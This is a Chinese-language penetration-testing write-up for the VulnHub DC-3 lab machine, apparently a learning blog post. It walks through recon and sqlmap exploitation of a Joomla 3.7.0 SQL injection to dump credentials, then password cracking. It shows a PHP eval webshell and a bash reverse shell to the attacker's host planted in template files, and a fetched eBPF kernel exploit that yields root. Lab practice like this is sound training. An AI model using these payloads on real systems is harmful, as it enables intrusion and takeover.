DC-3靶机的渗透学习
目录
0X00 靶机的环境搭配
0X01 信息收集
一、IP扫描
二、端口扫描
三、网站目录扫描
四、查看网站结构
五、网页信息获取编辑
0X02 登陆用户
一、账户名破解
1.1 joomla专业工具获取版本
1.2 漏洞利用
1.3 漏洞查询
1.4 sql爆破
1.4-1 爆破所有数据库
1.4-2 爆破所有表
1.4-3 爆破所有字段
1.4-4 爆取指定的字段
二、密码破解
0X03 木马上传
一、一句话木马
二、系统内核版本
0X04 提权
一、提权脚本下载本地
二、上传提权脚本
三、开始提权
四、提权查看
0X00 靶机的环境搭配
攻击机(KALI):192.168.226.128
靶机(DC-1): 192.168.226.129(未知)
靶机地址:DC: 3.2 ~ VulnHub
0X01 信息收集
一、IP扫描
┌──(root㉿kali)-[~]
└─# arp-scan -l
arp-scan命令: 是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设备)它可以构造并发送ARP请求到指定的IP地址,并且显示返回的所有响应。
arp-scan 可以显示本地网络中的所有连接设备,即使这些设备有防火墙。防火墙设备可以屏蔽ping,但是并不能屏蔽ARP数据包。
二、端口扫描
┌──(root㉿kali)-[~]
└─# nmap -T4 -sV -O -A -p- 192.168.226.129
-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p-(全部端口)
三、网站目录扫描
┌──(root㉿kali)-[~]
└─# dirb http://192.168.238.135http://192.168.238.135/administrator/
四、查看网站结构
我们看到CMS是joomla,joomla是一种使用PHP语言和MySQL数据库开发的软件系统
三大PHP CMS网站:Drupal、 Wordpress、Joomla
五、网页信息获取![](/assets/blank.gif)
没有ssh服务,但是我们找到了后台登录界面,只能一步步提权
0X02 登陆用户
一、账户名破解
1.1 joomla专业工具获取版本
┌──(root㉿kali)-[~]
└─# sudo┌──(root㉿kali)-[~]
└─# joomscan --url http://192.168.226.129
通过Wappalyzer火狐插件发现了目标网页CMS为 Joomla,使用专门扫它的工具joomscan 来扫描joomla
kali里面安装joomscan工具的命令是sudo apt-get install joomscan
扫描到目标网页 joomla版本为 3.7.0
1.2 漏洞利用
使用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞
┌──(root㉿kali)-[~]
└─# searchsploit Joomla 3.7.0 #确认版本为sql注入漏洞
1.3 漏洞查询
┌──(root㉿kali)-[~]
└─# cat /usr/share/exploitdb/exploits/php/webapps/42033.txt
1.4 sql爆破
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.226.129/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] #爆破所有数据库#-D "joomladb" --tables 指定数据库joomladb爆破所有表
#-D "joomladb" -T "#__users" --columns 指定joomladb数据库中user表爆破所有字段
#-D "joomladb" -T "#__users" -C id,nmae,password,username 爆取指定的字段
1.4-1 爆破所有数据库
1.4-2 爆破所有表
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.238.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]# -D "joomladb" --tables 指定数据库joomladb爆破所有表 我们找到了用户表
1.4-3 爆破所有字段
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.238.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]#-D "joomladb" -T "#__users" --columns 指定joomladb数据库中user表爆破所有字段
1.4-4 爆取指定的字段
┌──(root㉿kali)-[~]
└─# sqlmap -u "http://192.168.238.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C id,nmae,password,username --dump -p list[fullordering]# -D "joomladb" -T "#__users" -C id,nmae,password,username 爆取指定的字段
# 我们找到了用户名和密码,但是密码加密了
二、密码破解
┌──(root㉿kali)-[~]
└─# vim mima.txt #新建一个文件,将密码密文写入进去,用john破解密码$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
┌──(root㉿kali)-[~]
└─# john mima.txthttp://192.168.226.129/administratorhttp://192.168.226.129/administrator
admin snoopy #用获取到的账户密码登陆后台
http://192.168.226.129/templates/beez3/html/ #网站目录
0X03 木马上传
一、一句话木马
在index.php和error.php前面插入php脚本、kali开启监听、再次访问index网页执行脚本
<?php @eval($_POST['pass']);?> #负责上传病毒文件上去
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.226.128/1212 0>&1' ");
?> #负责收集Ubuntu16.04信息,启动反弹shell提权http://192.168.226.129/templates/beez3/error.php #一句话木马
http://192.168.226.129/templates/beez3/index.php #访问网站获得反弹shell在两个连接中分别插入php木马
┌──(root㉿kali)-[~/桌面/靶机/DC-3]
└─# nc -lvp 1212 #kali开启监听端口1212
二、系统内核版本
www-data@DC-3:/var/www/html/templates/beez3$ whoami
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linuxwww-data@DC-3:/var/www/html/templates/beez3$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04 LTS 查看到了版本
Release: 16.04
Codename: xenial┌──(root㉿kali)-[~]
└─# searchsploit ubuntu 16.04使用searchsploit工具查找Ubuntu 16.04的提权漏洞,发现一个“拒绝服务漏洞”,可以用来提权
cat /etc/issue
0X04 提权
一、提权脚本下载本地
复制漏洞信息到本地,根据提示下载对应脚本上传到服务器
┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali/Desktop/┌──(root㉿kali)-[~]
└─# cat 39772.txt #查看漏洞信息
二、上传提权脚本
www-data@DC-3:/var/www/html/templates/beez3$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
#根据提示下载攻击载荷,一般国外网站无法下载,可下载好用蚁剑拖进去
www-data@DC-3:/var/www/html/templates/beez3$ unzip 39772.zip #解压39772.zip文件
www-data@DC-3:/var/www/html/templates/beez3$ cd 39772
www-data@DC-3:/var/www/html/templates/beez3$ tar -xvf exploit.tar#解压exploit提权脚本tar包
www-data@DC-3:/var/www/html/templates/beez3$ cd ebpf_mapfd_doubleput_exploit
三、开始提权
<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ls
compile.sh doubleput.c hello.c suidhelper.c
<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ lscompile.sh doubleput doubleput.c hello.c suidhelper suidhelper.c
<emplates/beez3/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput #执行提权文件starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
四、提权查看
whoami
cd /root
ls
cat the-flag.txt
DC-3靶机的渗透学习相关推荐
- DC系列漏洞靶场-渗透测试学习复现(DC-1)
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...
- 【CyberSecurityLearning 74】DC系列之DC-5渗透测试
目录 DC系列之DC-5渗透测试 实验环境: 实验步骤: 1.主机扫描,确定目标主机IP 2.对DC-5进行端口扫描 3.访问DC-5的web服务,了解相关信息 4.使用wfuzz测试页面参数 5.看 ...
- 内网渗透学习-Windows信息收集
内网渗透学习-Windows信息收集 本章内容主要介绍在获取网站服务器webshell后,怎样对Windows主机进行信息收集,对其网络环境进行分析和利用,主要是一个思路整理,在后续的章节中会整理更详 ...
- 2021年1月4日-Vulnhub-DerpNStink渗透学习
2021年1月4日-Vulnhub-DerpNStink渗透学习 靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ kali地址:192.168 ...
- VulnHub-The Ether: EvilScience (v1.0.1)渗透学习
VulnHub-The Ether: EvilScience (v1.0.1)渗透学习 前言 靶机地址:https://download.vulnhub.com/lazysysadmin/Lazysy ...
- DC系列靶机DC-1
1,主机发现 1),nmap -sP 192.168.44.0/24 对当前网段内存活的主机进行扫描. 2),主机发现也可以使用 netdiscover -i eth0 -r 192.168.44.0 ...
- Web安全渗透学习-环境搭建
Web安全渗透-学习笔记-第一阶段 环境准备 OWASP靶机下载 OWASP下载教程 Kali虚拟机安装 虚拟机网络环境设置 虚拟机无法上网的情况 小得 环境准备 首先我只是一名纯小白,特别纯那种,目 ...
- web渗透学习路线图
前言 首先,你要高度热爱网络安全这个领域,你要问问自己是否是真的热爱这个行业,自己是否会因为各种了理由半途而废,放弃掉你的热爱.衡量热爱的方法特别特别地简单:看看自己主动花了多少时间在哪些事情方面,重 ...
- 文件上传漏洞---Web渗透学习
文件上传本身是一个系统的正常需求,但是由于开发人员在开发时欠缺相关的安全知识,在对用户文件上传部分的控制不足或者缺陷,而导致用户越过其本身权限向服务器上传可执行的动态脚本文件. 这里上传的文件可以是木 ...
最新文章
- python基础语言与应用第五章_《Python基础教程》 读书笔记 第五章(下)循环语句...
- pve虚拟机导入gho_用vmware安装gho文件心得
- 简洁强大的JavaWeb框架Blade
- 汇编语言(四)之比较字符串
- 三级pc技术_第十九周PC、笔电、数码周边新品汇总:AMD英特尔激战正酣
- [渝粤教育] 西北大学 数据结构 参考 资料
- oracle 查看监听命令_linux下使用Oracle常用命令
- C语言 位段(位域)总结
- 【暖*墟】#树链剖分# 树链剖分学习与练习
- PYTHON_SPLIT
- java中文转英文_eclipse英文转中文怎么设置 eclipse中英文切换图文教程
- 【矩阵篇】九宫图/n宫图生成——Merzirac法生成奇阶幻方 Python实现
- E. Vowels(SOSdp的简单转化)
- 软件测试(二)测试方法测试任务
- 【GPU精粹与Shader编程】(七) 一篇文章读完《GPU Gems 3》
- java 视频统一转成mp4格式,并且异步多线程上传
- Linux7修改网卡为eht0
- 纯CSS制作自适应分页条-分享------彭记(019)
- 打印机在2k/xp下的自定义纸张设定
- 一张图看懂计算机网络——计算机体系结构
热门文章
- 代码界的那些神级“教父”,看你认识几个?
- windos10+ubuntu16.4安装历程(超级详细,解决识别不出未分配空间等问题)
- 计算机网络—网络原理之<TCP/IP 五层协议 >图解+详述
- Int8,Int16,Int32,Int64 有啥不同呢?看了立马就懂!
- uniapp 安卓多个音频_Win10发布新版,可从PC直接访问安卓手机APP,你会重启升级吗?...
- C#制作高仿360安全卫士窗体二
- 精通Python——GUI编程学习
- 某程序员转行前的感慨 -【告别程序员生涯 】
- 【数组】数组方法push
- Python课堂练习